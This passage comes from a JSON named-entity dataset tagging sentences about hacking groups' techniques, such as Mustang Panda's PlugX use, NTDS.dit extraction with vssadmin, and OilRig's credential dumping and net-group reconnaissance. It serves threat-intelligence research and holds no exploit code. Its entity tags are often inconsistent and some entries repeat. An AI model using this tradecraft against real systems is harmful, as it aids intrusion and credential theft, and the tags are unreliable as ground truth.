"O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "O", "I-Tool", "O" ] }, { "tokens": [ "Mustang", "Panda's", "PlugX", "variant", "has", "created", "a", "hidden", "folder", "on", "USB", "drives", "named", "<code>RECYCLE.BIN</code>", "to", "store", "malicious", "executables", "and", "collected", "data." ], "ner_tags": [ "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "downloaded", "additional", "executables", "following", "the", "initial", "infection", "stage." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "<code>InstallUtil.exe</code>", "to", "execute", "a", "malicious", "Beacon", "stager." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "stored", "collected", "credential", "files", "in", "<code>c:\\windows\\temp</code>", "prior", "to", "exfiltration.", "Mustang", "Panda", "has", "also", "stored", "documents", "for", "exfiltration", "in", "a", "hidden", "folder", "on", "USB", "drives." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "sent", "malicious", "files", "requiring", "direct", "victim", "interaction", "to", "execute." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "sent", "malicious", "links", "including", "links", "directing", "victims", "to", "a", "Google", "Drive", "folder." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "names", "like", "`adobeupdate.dat`", "and", "`PotPlayerDB.dat`", "to", "disguise", "PlugX,", "and", "a", "file", "named", "`OneDrive.exe`", "to", "load", "a", "Cobalt", "Strike", "payload." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "mshta.exe", "to", "launch", "collection", "scripts." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "vssadmin", "to", "create", "a", "volume", "shadow", "copy", "and", "retrieve", "the", "NTDS.dit", "file.", "Mustang", "Panda", "has", "also", "used", "<code>reg", "save</code>", "on", "the", "SYSTEM", "file", "Registry", "location", "to", "help", "extract", "the", "NTDS.dit", "file." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "delivered", "initial", "payloads", "hidden", "using", "archives", "and", "encoding", "measures." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "malicious", "PowerShell", "scripts", "to", "enable", "execution." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "<code>tasklist", "/v</code>", "to", "determine", "active", "process", "information." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "created", "the", "registry", "key", "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\AdobelmdyU</code>", "to", "maintain", "persistence." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "installed", "TeamViewer", "on", "targeted", "systems." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "a", "customized", "PlugX", "variant", "which", "could", "spread", "through", "USB", "connections." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "created", "a", "scheduled", "task", "to", "execute", "additional", "malicious", "software,", "as", "well", "as", "maintain", "persistence." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "searched", "the", "victim", "system", "for", "the", "<code>InstallUtil.exe</code>", "program", "and", "its", "version." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "spearphishing", "attachments", "to", "deliver", "initial", "access", "payloads." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "delivered", "malicious", "links", "to", "their", "intended", "targets." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "delivered", "web", "bugs", "to", "profile", "their", "intended", "targets." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "servers", "under", "their", "control", "to", "validate", "tracking", "pixels", "sent", "to", "phishing", "victims." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "encrypted", "C2", "communications", "with", "RC4." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "gathered", "system", "information", "using", "<code>systeminfo</code>." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "<code>ipconfig</code>", "and", "<code>arp</code>", "to", "determine", "network", "configuration", "information." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "<code>netstat", "-ano</code>", "to", "determine", "network", "connection", "information." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "hosted", "malicious", "payloads", "on", "DropBox", "including", "PlugX." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Mustang", "Panda", "has", "embedded", "VBScript", "components", "in", "LNK", "files", "to", "download", "additional", "files", "and", "automate", "collection." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "communicated", "with", "its", "C2", "via", "HTTP", "POST", "requests." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "DropBox", "URLs", "to", "deliver", "variants", "of", "PlugX." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Mustang", "Panda", "has", "executed", "HTA", "files", "via", "cmd.exe,", "and", "used", "batch", "scripts", "for", "collection." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "executed", "PowerShell", "scripts", "via", "WMI." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Tool", "O", "B-Way" ] }, { "tokens": [ "Mustang", "Panda's", "custom", "ORat", "tool", "uses", "a", "WMI", "event", "consumer", "to", "maintain", "persistence." ], "ner_tags": [ "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Mustard", "Tempest", "operates", "a", "global", "network", "of", "compromised", "websites", "that", "redirect", "into", "a", "traffic", "distribution", "system", "(TDS)", "to", "select", "victims", "for", "a", "fake", "browser", "update", "page." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustard", "Tempest", "has", "used", "drive-by", "downloads", "for", "initial", "infection,", "often", "using", "fake", "browser", "updates", "as", "a", "lure." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Mustard", "Tempest", "has", "injected", "malicious", "JavaScript", "into", "compromised", "websites", "to", "infect", "victims", "via", "drive-by", "download." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustard", "Tempest", "has", "deployed", "secondary", "payloads", "and", "third", "stage", "implants", "to", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustard", "Tempest", "has", "lured", "users", "into", "downloading", "malware", "through", "malicious", "links", "in", "fake", "advertisements", "and", "spearphishing", "emails." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Mustard", "Tempest", "has", "posted", "false", "advertisements", "including", "for", "software", "packages", "and", "browser", "updates", "in", "order", "to", "distribute", "malware." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustard", "Tempest", "has", "used", "the", "filename", "`AutoUpdater.js`", "to", "mimic", "legitimate", "update", "files", "and", "has", "also", "used", "the", "Cyrillic", "homoglyph", "characters", "С", "`(0xd0a1)`", "and", "а", "`(0xd0b0)`,", "to", "produce", "the", "filename", "`Сhrome.Updаte.zip`." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustard", "Tempest", "has", "poisoned", "search", "engine", "results", "to", "return", "fake", "software", "updates", "in", "order", "to", "distribute", "malware." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustard", "Tempest", "has", "acquired", "servers", "to", "host", "second-stage", "payloads", "that", "remain", "active", "for", "a", "period", "of", "either", "days,", "weeks,", "or", "months." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustard", "Tempest", "has", "sent", "victims", "emails", "containing", "links", "to", "compromised", "websites." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Mustard", "Tempest", "has", "used", "implants", "to", "perform", "system", "reconnaissance", "on", "targeted", "systems." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustard", "Tempest", "has", "hosted", "payloads", "on", "acquired", "second-stage", "servers", "for", "periods", "of", "either", "days,", "weeks,", "or", "months." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Naikon", "has", "used", "the", "RoyalRoad", "exploit", "builder", "to", "drop", "a", "second", "stage", "loader,", "intel.wll,", "into", "the", "Word", "Startup", "folder", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "B-Exp", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Tool", "B-SecTeam", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Naikon", "has", "used", "DLL", "side-loading", "to", "load", "malicious", "DLL's", "into", "legitimate", "executables." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Naikon", "has", "used", "administrator", "credentials", "for", "lateral", "movement", "in", "compromised", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Naikon", "has", "convinced", "victims", "to", "open", "malicious", "attachments", "to", "execute", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Naikon", "renamed", "a", "malicious", "service", "<code>taskmgr</code>", "to", "appear", "to", "be", "a", "legitimate", "version", "of", "Task", "Manager." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Naikon", "has", "disguised", "malicious", "programs", "as", "Google", "Chrome,", "Adobe,", "and", "VMware", "executables." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Tool", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Naikon", "has", "used", "the", "LadonGo", "scanner", "to", "scan", "target", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Naikon", "has", "modified", "a", "victim's", "Windows", "Run", "registry", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Naikon", "has", "used", "a", "netbios", "scanner", "for", "remote", "machine", "identification." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Naikon", "has", "used", "schtasks.exe", "for", "lateral", "movement", "in", "compromised", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Naikon", "uses", "commands", "such", "as", "<code>netsh", "advfirewall", "firewall</code>", "to", "discover", "local", "firewall", "settings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "B-Purp", "O" ] }, { "tokens": [ "Naikon", "has", "used", "malicious", "e-mail", "attachments", "to", "deliver", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Naikon", "uses", "commands", "such", "as", "<code>netsh", "interface", "show</code>", "to", "discover", "network", "interface", "settings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Naikon", "has", "used", "WMIC.exe", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Nomadic", "Octopus", "executed", "PowerShell", "in", "a", "hidden", "window." ], "ner_tags": [ "B-Idus", "B-Tool", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Nomadic", "Octopus", "has", "used", "malicious", "macros", "to", "download", "additional", "files", "to", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Nomadic", "Octopus", "as", "attempted", "to", "lure", "victims", "into", "clicking", "on", "malicious", "attachments", "within", "spearphishing", "emails." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Nomadic", "Octopus", "attempted", "to", "make", "Octopus", "appear", "as", "a", "Telegram", "Messenger", "with", "a", "Russian", "interface." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Area", "O" ] }, { "tokens": [ "Nomadic", "Octopus", "has", "used", "PowerShell", "for", "execution." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Nomadic", "Octopus", "has", "targeted", "victims", "with", "spearphishing", "emails", "containing", "malicious", "attachments." ], "ner_tags": [ "B-Idus", "B-Tool", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Nomadic", "Octopus", "used", "<code>cmd.exe", "/c</code>", "within", "a", "malicious", "macro." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "used", "the", "Plink", "utility", "and", "other", "tools", "to", "create", "tunnels", "to", "C2", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "automated", "collection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "brute", "force", "techniques", "to", "obtain", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "credential", "dumping", "tools", "such", "as", "LaZagne", "to", "steal", "credentials", "to", "accounts", "logged", "into", "the", "compromised", "system", "and", "to", "Outlook", "Web", "Access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "various", "types", "of", "scripting", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "a", "CHM", "payload", "to", "load", "and", "execute", "another", "malicious", "file", "once", "delivered", "to", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "credential", "dumping", "tools", "such", "as", "LaZagne", "to", "steal", "credentials", "to", "accounts", "logged", "into", "the", "compromised", "system", "and", "to", "Outlook", "Web", "Access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "credential", "dumping", "tools", "such", "as", "LaZagne", "to", "steal", "credentials", "to", "accounts", "logged", "into", "the", "compromised", "system", "and", "to", "Outlook", "Web", "Access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "credential", "dumping", "tools", "such", "as", "LaZagne", "to", "steal", "credentials", "to", "accounts", "logged", "into", "the", "compromised", "system", "and", "to", "Outlook", "Web", "Access.", "OilRig", "has", "also", "used", "tool", "named", "PICKPOCKET", "to", "dump", "passwords", "from", "web", "browsers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "DNS", "for", "C2", "including", "the", "publicly", "available", "<code>requestbin.net</code>", "tunneling", "service." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "OilRig", "macro", "has", "run", "a", "PowerShell", "command", "to", "decode", "file", "contents.", "OilRig", "has", "also", "used", "certutil", "to", "decode", "base64-encoded", "files", "on", "victims." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "run", "<code>net", "user</code>,", "<code>net", "user", "/domain</code>,", "<code>net", "group", "“domain", "admins”", "/domain</code>,", "and", "<code>net", "group", "“Exchange", "Trusted", "Subsystem”", "/domain</code>", "to", "get", "account", "listings", "on", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "<code>net", "group", "/domain</code>,", "<code>net", "group", "“domain", "admins”", "/domain</code>,", "and", "<code>net", "group", "“Exchange", "Trusted", "Subsystem”", "/domain</code>", "to", "find", "domain", "group", "permission", "settings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "encrypted", "and", "encoded", "data", "in", "its", "malware,", "including", "by", "using", "base64." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "OilRig", "has", "exfiltrated", "data", "over", "FTP", "separately", "from", "its", "primary", "C2", "channel", "over", "DNS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "uses", "remote", "services", "such", "as", "VPN,", "Citrix,", "or", "OWA", "to", "persist", "in", "an", "environment." ], "ner_tags": [ "B-Idus", "O", "B-Tool", "B-Way", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "malware", "ISMAgent", "falls", "back", "to", "its", "DNS", "tunneling", "mechanism", "if", "it", "is", "unable", "to", "reach", "the", "C2", "server", "over", "HTTP." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "OilRig", "has", "deleted", "files", "associated", "with", "their", "payload", "after", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "tested", "malware", "samples", "to", "determine", "AV", "detection", "and", "subsequently", "modified", "the", "samples", "to", "ensure", "AV", "evasion." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "can", "download", "remote", "files", "onto", "victims." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "B-Way", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "keylogging", "tools", "called", "KEYPUNCH", "and", "LONGWATCH." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "OilRig", "has", "used", "credential", "dumping", "tools", "such", "as", "LaZagne", "to", "steal", "credentials", "to", "accounts", "logged", "into", "the", "compromised", "system", "and", "to", "Outlook", "Web", "Access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "credential", "dumping", "tools", "such", "as", "Mimikatz", "to", "steal", "credentials", "to", "accounts", "logged", "into", "the", "compromised", "system", "and", "to", "Outlook", "Web", "Access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "run", "<code>net", "user</code>,", "<code>net", "user", "/domain</code>,", "<code>net", "group", "“domain", "admins”", "/domain</code>,", "and", "<code>net", "group", "“Exchange", "Trusted", "Subsystem”", "/domain</code>", "to", "get", "account", "listings", "on", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "<code>net", "localgroup", "administrators</code>", "to", "find", "local", "administrators", "on", "compromised", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "delivered", "macro-enabled", "documents", "that", "required", "targets", "to", "click", "the", "\"enable", "content\"", "button", "to", "execute", "the", "payload", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "delivered", "malicious", "links", "to", "achieve", "execution", "on", "the", "target", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", ".doc", "file", "extensions", "to", "mask", "malicious", "executables." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "OilRig", "has", "used", "the", "publicly", "available", "tool", "SoftPerfect", "Network", "Scanner", "as", "well", "as", "a", "custom", "tool", "called", "GOLDIRONY", "to", "conduct", "network", "scanning." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "abused", "the", "Outlook", "Home", "Page", "feature", "for", "persistence.", "OilRig", "has", "also", "used", "CVE-2017-11774", "to", "roll", "back", "the", "initial", "patch", "designed", "to", "protect", "against", "Home", "Page", "abuse." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "net.exe", "in", "a", "script", "with", "<code>net", "accounts", "/domain</code>", "to", "find", "the", "password", "policy", "of", "a", "domain." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "tools", "to", "identify", "if", "a", "mouse", "is", "connected", "to", "a", "targeted", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "PowerShell", "scripts", "for", "execution,", "including", "use", "of", "a", "macro", "to", "run", "a", "PowerShell", "command", "to", "decode", "file", "contents." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "run", "<code>tasklist</code>", "on", "a", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "the", "Plink", "utility", "and", "other", "tools", "to", "create", "tunnels", "to", "C2", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "I-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "<code>reg", "query", "“HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal", "Server", "Client\\Default”</code>", "on", "a", "victim", "to", "query", "the", "Registry." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "Remote", "Desktop", "Protocol", "for", "lateral", "movement.", "The", "group", "has", "also", "used", 